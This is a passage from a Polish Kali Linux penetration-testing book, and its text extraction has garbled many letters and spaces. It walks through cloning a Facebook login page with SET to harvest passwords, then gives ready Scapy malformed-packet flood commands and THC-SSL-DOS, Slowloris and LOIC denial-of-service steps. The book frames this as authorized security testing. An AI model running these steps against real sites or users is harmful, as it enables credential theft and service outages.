Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

